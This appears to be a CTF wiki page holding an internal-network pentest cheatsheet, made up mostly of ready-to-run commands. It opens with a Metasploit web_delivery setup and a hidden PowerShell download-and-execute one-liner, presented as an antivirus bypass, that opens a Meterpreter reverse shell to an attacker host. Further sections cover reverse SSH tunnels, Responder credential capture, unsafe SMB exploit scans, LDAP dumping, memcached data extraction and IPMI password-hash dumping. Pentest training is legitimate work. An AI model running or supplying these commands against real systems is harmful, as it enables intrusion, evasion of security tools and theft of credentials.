Network - adeptex/CTF GitHub Wiki

Internal Network Pentest Cheatsheet

Powershell Meterpreter Reverse shell (Antivirus Bypass)

use exploit/multi/script/web_delivery
set SRVHOST 192.168.0.1
set SRVPORT 8443
set SSL true
set target 2
set URIPATH ps
set PAYLOAD windows/x64/meterpreter/reverse_https
set LHOST 192.168.0.1
set LPORT 443
run -j

powershell.exe -nop -w hidden -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$g=new-object net.webclient;$g.proxy=[Net.WebRequest]::GetSystemWebProxy();$g.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $g.downloadstring('https://192.168.0.1:8443/ps');

Network Mask

apt install whatmask
whatmask 10.0.0.22/25

import ipaddress
print(list(ipaddress.ip_network("192.168.0.22/28", False).hosts()))

Traffic

# Monitor
tcpdump -A -i eth0 port not 22  # HTTP
tcpdump -AX -i eth0 port not 22

# Find PID from listening network port
ss -pet | egrep $PORT

# Known services on port
https://www.speedguide.net/port.php?port=$PORT

Tunnels

## Reverse SSH Tunnel
nohup ssh user@vps -p 22 -f -N -R 2222:127.0.0.1:22

# Expose Remote Service
ssh user@vps -p 22 -f -N -R 2223:127.0.0.1:8834
socat TCP-LISTEN:2224,su=nobody,fork,reuseaddr TCP-CONNECT:127.0.0.1:2223

Services

db_nmap -T4 -p- -sV -sC -O -v -n -Pn --open --max-hostgroup 4 -oX nmap.tcp.xml -iL hosts.txt
db_nmap -T4 -p1-1000 -sU -sV -sC -v -n -Pn --open --max-hostgroup 4 -oX nmap.udp.xml -iL hosts.txt

Text-based web

apt install w3m
curl -Lk https://url | w3m -dump -T text/html

Spider

wget https://github.com/s0rg/crawley/releases/download/v1.7.10/crawley_v1.7.10_linux_x86_64.tar.gz \
    && tar xvf crawley_v1.7.10_linux_x86_64.tar.gz crawley
./crawley -depth -1 -skip-ssl -headless -all https://url | tee sitemap.txt

Dirs

pip3 install dirsearch
dirsearch --no-color --random-agent --full-url -x 404 --timeout 3 --threads 3 --max-rate 30 -u https://url
find reports -iname '*.txt' | xargs cat | egrep 'https?://.*' | egrep -v '^(#|404) ' > dirs.txt

Nuclei

# https://github.com/projectdiscovery/nuclei/releases
wget https://github.com/projectdiscovery/nuclei/releases/download/v3.3.4/nuclei_3.3.4_linux_amd64.zip \
    && unzip nuclei_3.3.4_linux_amd64.zip
# https://github.com/projectdiscovery/nuclei-templates/releases
wget https://github.com/projectdiscovery/nuclei-templates/archive/refs/tags/v10.0.1.tar.gz \
    && tar xvf v10.0.1.tar.gz

./nuclei -duc -ni -v -timeout 3 -rl 20 -c 4 -retries 0 -follow-redirects -max-redirects 5 -project-path ./nuc -je ./nuc.json -o ./nuc.txt -store-resp-dir ./nuc/cache -t templates/http/technologies -l urls.txt

CVEs

# https://github.com/projectdiscovery/cvemap/releases/
wget https://github.com/projectdiscovery/cvemap/releases/download/v0.0.7/cvemap_0.0.7_linux_amd64.zip \
    && unzip cvemap_0.0.7_linux_amd64.zip

# Get apikey at https://cloud.projectdiscovery.io
./cvemap -auth
./cvemap -duc -q weblogic


# CVE details
https://www.cvedetails.com/cve/CVE-2024-xxxxx

Transport Layer Security (TLS)

# SSL/TLS Versions
sslscan --no-ciphersuites --no-fallback --no-renegotiation --no-compression --no-heartbleed --no-cipher-details --no-groups --no-sigs --bugs --verbose --xml=sslscan.xml --targets=sslscan.targets.txt

# TLS cert signed for domains
target="domain.com:443"; echo \
    | openssl s_client -showcerts -connect $target 2>/dev/null \
    | openssl x509 -inform pem -noout -text \
    | egrep -o 'DNS:.*' \
    | sed 's/, /\n/g' \
    | sed 's/DNS://g'

Sniper

git clone https://github.com/1N3/Sn1per
Sn1per/install.sh
sniper -w workspace -f /root/hosts.txt -m airstrike
sniper -w workspace -f /root/hosts.txt -m nuke

EyeWitness

apt install eyewitness
eyewitness --web -d ewout -f urls.txt && mv ewout/screens . && rm -rf ewout

git clone https://github.com/ChrisTruncer/EyeWitness
EyeWitness/EyeWitness.py --active-scan --prepend-https --web -f http_hosts.txt

Responder

git clone https://github.com/SpiderLabs/Responder
Responder/Responder.py -I eth0 -wrf

SMB

nmap --script=smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-cve-2017-7494.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse,smb-vuln-regsvc-dos.nse --script-args=unsafe=1 -p445 -Pn -n -T4 -v --max-hostgroup=2 -oA smb-vulns -iL hosts.txt

Pass the Hash: https://www.offensive-security.com/metasploit-unleashed/psexec-pass-hash/

LDAP

pip install ldap3 dnspython ldapdomaindump
ldapdomaindump -u "DOMAIN\user" -o /root/ldap 192.168.0.1

Memcached (11211/tcp)

apt install libmemcached-tools
memccat --servers 192.168.0.1 `memcdump --servers 192.168.0.1`

IPMI

https://www.thomas-krenn.com/en/wiki/Security_Recommendations_for_Remote_Maintenance_Features_for_IPMI_Chips_with_ATEN-Software

  • http://ip-of-ipmi/save_config.bin
  • http://ip-of-ipmi/save_config
  • http://ip-of-ipmi/images/Snapshot.bmp

Get users and their password hashes with scanner/ipmi/ipmi_dumphashes